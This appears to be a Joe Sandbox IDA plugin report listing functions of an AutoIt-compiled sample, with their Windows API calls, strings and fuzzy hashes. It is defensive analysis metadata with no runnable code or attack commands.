                                        • Opcode Fuzzy Hash: 060f427c3cbec99be2535618e46ede1a7391c513f3d70c489905815c26d86e08
                                        • Instruction Fuzzy Hash: 55917075A00244DFCB54DF59C484EAABBF1BF44704F1980A9E80AAF3A2C775ED85CB91
                                        APIs
                                        • __startOneArgErrorHandling.LIBCMT ref: 0009E30D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorHandling__start
                                        • String ID: pow
                                        • API String ID: 3213639722-2276729525
                                        • Opcode ID: 3ec67c9bd4720bf50cd11c3e1000d12b91a3488037f7982aa0418d01c247471c
                                        • Instruction ID: c6869c860fa2340381353fbe9cd285fd9f0aed964e9b99d092213f93254b4650
                                        • Opcode Fuzzy Hash: 3ec67c9bd4720bf50cd11c3e1000d12b91a3488037f7982aa0418d01c247471c
                                        • Instruction Fuzzy Hash: B2515C61A0C242A6CF65F754CE053FE3BE4EB51740F34CD68E0D9422EAEB358DD1AA46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: 120224b27ce7e87a67a5104db61422ee3d58ce5e6266d0730e773cca8dde7527
                                        • Instruction ID: 9d7f1dac37b51a871c4a08134f47b2d8315abbb0e25189e60c4b8187203e27bc
                                        • Opcode Fuzzy Hash: 120224b27ce7e87a67a5104db61422ee3d58ce5e6266d0730e773cca8dde7527
                                        • Instruction Fuzzy Hash: FD512435904286EFDF65EF68C481EFE7BE4EF25310F248159E8919B2D1DA349D42CB90
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 0008F2A2
                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0008F2BB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: GlobalMemorySleepStatus
                                        • String ID: @
                                        • API String ID: 2783356886-2766056989
                                        • Opcode ID: c3c5a7cd00fc71ff74b7a3c5693dc505709be5e63c65fa6ca0ce1e78d82de97d
                                        • Instruction ID: 3d45c860b752d95ddd92a2240586f50fcda2de22656bb10251bcc87065885da0
                                        • Opcode Fuzzy Hash: c3c5a7cd00fc71ff74b7a3c5693dc505709be5e63c65fa6ca0ce1e78d82de97d
                                        • Instruction Fuzzy Hash: 03515971808744ABD320AF10DC86BAFB7F8FB95340F81885CF1D9411A6EB758569CB6B
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 000F57E0
                                        • _wcslen.LIBCMT ref: 000F57EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper_wcslen
                                        • String ID: CALLARGARRAY
                                        • API String ID: 157775604-1150593374
                                        • Opcode ID: cc06e300e0f91a16f992b1d5e0677e1d2ed1ab50955dd0c0a6897db7cc7e3822
                                        • Instruction ID: 8ecc6490158760d7f8a42ca72d5bc73066f05bfb51246a369086ec630bd7110e
                                        • Opcode Fuzzy Hash: cc06e300e0f91a16f992b1d5e0677e1d2ed1ab50955dd0c0a6897db7cc7e3822
                                        • Instruction Fuzzy Hash: 3A41B271E002099FCB14DFA8C8818FEBBF5FF59351F204029E605A7292EB749D82DB90
                                        APIs
                                        • _wcslen.LIBCMT ref: 000ED130
                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 000ED13A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CrackInternet_wcslen
                                        • String ID: |
                                        • API String ID: 596671847-2343686810
                                        • Opcode ID: f92c747ecaebd8e779f35a2c2bd46e205e41e3024b672015fbc15673f3f8b99a
                                        • Instruction ID: 3f1cf9dbc9b25c02f70f7437bbafd0c9c85e6036497af093f7aa918b5b30a1f1
                                        • Opcode Fuzzy Hash: f92c747ecaebd8e779f35a2c2bd46e205e41e3024b672015fbc15673f3f8b99a
                                        • Instruction Fuzzy Hash: 3B311971D00209AFCF15EFA5CC85AEEBFB9FF04300F004059F819A6162EB35AA46DB65
                                        APIs
                                        • DestroyWindow.USER32(?,?,?,?), ref: 00103621
                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0010365C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$DestroyMove
                                        • String ID: static
                                        • API String ID: 2139405536-2160076837
                                        • Opcode ID: 9d05e732aee10ccd23734b3de8e9cfe3afc1ab7722cd5bf94ef8b00d0b90b8ca
                                        • Instruction ID: 840fc0160f3fc4494b32164be000c74be828b2625ac62b74cb683cbe3ed1f3ec
                                        • Opcode Fuzzy Hash: 9d05e732aee10ccd23734b3de8e9cfe3afc1ab7722cd5bf94ef8b00d0b90b8ca
                                        • Instruction Fuzzy Hash: A3318D71100604AEDB109F68DC80EFB73ADFF88720F109619F8A597290DBB1AD91DB60
                                        APIs
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0010461F
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00104634
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: '
                                        • API String ID: 3850602802-1997036262
                                        • Opcode ID: d7cdc70f0a27974843004747d20f9b7ae77c66228b539137f22bbefb1cccffa8
                                        • Instruction ID: 1d9048490b1218cdae4503f232692415bb1d1f777b4c8530339edb8fd8283ddd
                                        • Opcode Fuzzy Hash: d7cdc70f0a27974843004747d20f9b7ae77c66228b539137f22bbefb1cccffa8
                                        • Instruction Fuzzy Hash: E0312CB4A01309AFDF14CFA9C991BDA7BB5FF49300F144069EA45AB391E7B1A941CF90
                                        APIs
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0010327C
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00103287
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Combobox
                                        • API String ID: 3850602802-2096851135
                                        • Opcode ID: 33d85aaf8d1ffdb55087c562a2eefaf7a58499ec1f503504d85bc5d0cfb434b2
                                        • Instruction ID: b878f8c82a0a22060747dd5b81e4b48100989cf5da1fab05eee7604f2679fb44
                                        • Opcode Fuzzy Hash: 33d85aaf8d1ffdb55087c562a2eefaf7a58499ec1f503504d85bc5d0cfb434b2
                                        • Instruction Fuzzy Hash: EE1190712002087FEF259F54DC81EFB376EEB983A4F104125F968972D1D7B19D5187A0
                                        APIs
                                          • Part of subcall function 0007600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0007604C
                                          • Part of subcall function 0007600E: GetStockObject.GDI32(00000011), ref: 00076060
                                          • Part of subcall function 0007600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0007606A
                                        • GetWindowRect.USER32(00000000,?), ref: 0010377A
                                        • GetSysColor.USER32(00000012), ref: 00103794
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                        • String ID: static
                                        • API String ID: 1983116058-2160076837
                                        • Opcode ID: 3a2c8a8e84fde0b56be55a1b5effd73c446a01735937dd02d565e13b03b36603
                                        • Instruction ID: baf45ca97d1b580ba9723217598c7baf595033aa5e190d9666db670d722a1297
                                        • Opcode Fuzzy Hash: 3a2c8a8e84fde0b56be55a1b5effd73c446a01735937dd02d565e13b03b36603
                                        • Instruction Fuzzy Hash: B7113AB261020AAFDF01DFA8CC45EEA7BB8FF08354F004A15FDA5E2290D775E8519B90
                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 000ECD7D
                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 000ECDA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Internet$OpenOption
                                        • String ID: <local>
                                        • API String ID: 942729171-4266983199
                                        • Opcode ID: 29f96478f399e3288640b3ac7fd7bd0be21ab9e2df09ef831f2530853cf822d9
                                        • Instruction ID: 95c6aa88a74555fefa2c57a8c7f3c828613110229f727417419032897d954b4f
                                        • Opcode Fuzzy Hash: 29f96478f399e3288640b3ac7fd7bd0be21ab9e2df09ef831f2530853cf822d9
                                        • Instruction Fuzzy Hash: C511C671209671BEE7784B678C45EE7BEACEF127A4F004236B149A3080D7779842D6F0
                                        APIs
                                        • GetWindowTextLengthW.USER32(00000000), ref: 001034AB
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001034BA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LengthMessageSendTextWindow
                                        • String ID: edit
                                        • API String ID: 2978978980-2167791130
                                        • Opcode ID: 721493c3daa174c8679a6174f9c5ec4e2433521d15ef635cbef6e1abf2d2033a
                                        • Instruction ID: 223b32fcf0d0683719ed75cbc2ad3b456d323d6161c002587df7d825201fc18e
                                        • Opcode Fuzzy Hash: 721493c3daa174c8679a6174f9c5ec4e2433521d15ef635cbef6e1abf2d2033a
                                        • Instruction Fuzzy Hash: 06116A71100208AAEB229F64DC84AEB376EEB15378F504724F9B5DB1E0C7B1DC919BA0
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • CharUpperBuffW.USER32(?,?,?), ref: 000D6CB6
                                        • _wcslen.LIBCMT ref: 000D6CC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: STOP
                                        • API String ID: 1256254125-2411985666
                                        • Opcode ID: 96809d0529e5f1b626a486f8d9b04b0a1bb52cbe3d566ac0fb6263eccecf1bbc
                                        • Instruction ID: 2cae5344bcdc90550ded5843b01748ef0219c8f4a069bc7ffb18cc536437c556
                                        • Opcode Fuzzy Hash: 96809d0529e5f1b626a486f8d9b04b0a1bb52cbe3d566ac0fb6263eccecf1bbc
                                        • Instruction Fuzzy Hash: B301C432A146268ACB219FBDDC819BF77E6EF61710B500526E85296291EB37D940C660
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000D3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 000D3CCA
                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 000D1D4C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 40115fb6e1d4b09fa1c1c3f98bf09781599d1edfdc4f09d393ef184c7192e67b
                                        • Instruction ID: 30bb543005d5e657fb1141a90fba1c130cb6fe33e2e7fc491f801d098aafe1ff
                                        • Opcode Fuzzy Hash: 40115fb6e1d4b09fa1c1c3f98bf09781599d1edfdc4f09d393ef184c7192e67b
                                        • Instruction Fuzzy Hash: E501D471A11318BBCB18EBA4CC52CFE73AAEB56350B04061AF866673C2EF3559088771
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000D3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 000D3CCA
                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 000D1C46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 59c23cf0148afb583607a4c263f0c09a43aa34cb3aa683cbcc429590410b3e8c
                                        • Instruction ID: c96ae080d353f82764f551c0f802c910c544a96354fa8536210bb005ea9d6211
                                        • Opcode Fuzzy Hash: 59c23cf0148afb583607a4c263f0c09a43aa34cb3aa683cbcc429590410b3e8c
                                        • Instruction Fuzzy Hash: 6C01A775B9120876DF14EB90CD52DFF77E99B11340F14101AA41667383EE249E0887B6
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000D3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 000D3CCA
                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 000D1CC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 2d53bfb77957c928bc5fc874beae904b0ae536842bf9b81cc068c59c5d987fa3
                                        • Instruction ID: fc01db479c33085ab163fc6b1938fcdb151a74d17d6477d6a1561e11873551bf
                                        • Opcode Fuzzy Hash: 2d53bfb77957c928bc5fc874beae904b0ae536842bf9b81cc068c59c5d987fa3
                                        • Instruction Fuzzy Hash: 5401A2B1B9021876CB14EBA0CA02EFE73E99B11340F541026B80673382EE659F0886B6
                                        APIs
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000D3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 000D3CCA
                                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 000D1DD3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 55c675f42c369b686c90a4e974f14b85b19753fc1c7d6a159e9b3d24f8827f38
                                        • Instruction ID: 5dab848ba17223ae205d55e2ddf1a70c3cb99814b3f5425f10fea77a306d5e52
                                        • Opcode Fuzzy Hash: 55c675f42c369b686c90a4e974f14b85b19753fc1c7d6a159e9b3d24f8827f38
                                        • Instruction Fuzzy Hash: EAF0FF71F503187ACB14E7A4CC52EFEB3A9AB12350F04091AB826633C2EF645A0882B5
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: 3, 3, 16, 1
                                        • API String ID: 176396367-3042988571
                                        • Opcode ID: 3d5c97dd553277e01eed14d6d0929bcf82129878c6313d41f1bd5f8ec37f1143
                                        • Instruction ID: 3a0855bfe3f74175ee834da5ab6ee0ddb87c60ac7d8a66cecf150ed912cb524b
                                        • Opcode Fuzzy Hash: 3d5c97dd553277e01eed14d6d0929bcf82129878c6313d41f1bd5f8ec37f1143
                                        • Instruction Fuzzy Hash: 5BE02B022052241092712279ACC1DBF56C9DFC9750710182BFA89C22A7EB94DD92B3A2
                                        APIs
                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 000D0B23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Message
                                        • String ID: AutoIt$Error allocating memory.
                                        • API String ID: 2030045667-4017498283
                                        • Opcode ID: 73696782cfe9675eea3c9ef968ffa4c857faf58f7fe11efd6662e2f1770ffb46
                                        • Instruction ID: e58c1efbd57cda039c4b048a19d56a142c79c2010abe8c3e695587af3f8639b2
                                        • Opcode Fuzzy Hash: 73696782cfe9675eea3c9ef968ffa4c857faf58f7fe11efd6662e2f1770ffb46
                                        • Instruction Fuzzy Hash: DEE0D83124830866D21437547C03FD97BC59F05F65F104427F7C8555C38BE224904BE9
                                        APIs
                                          • Part of subcall function 0008F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00090D71,?,?,?,0007100A), ref: 0008F7CE
                                        • IsDebuggerPresent.KERNEL32(?,?,?,0007100A), ref: 00090D75
                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0007100A), ref: 00090D84
                                        Strings
                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00090D7F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                        • API String ID: 55579361-631824599
                                        • Opcode ID: f1ed0a0d32d812df7def5fee383d8730a16ad6f31804dd0ad81966b3601b2016
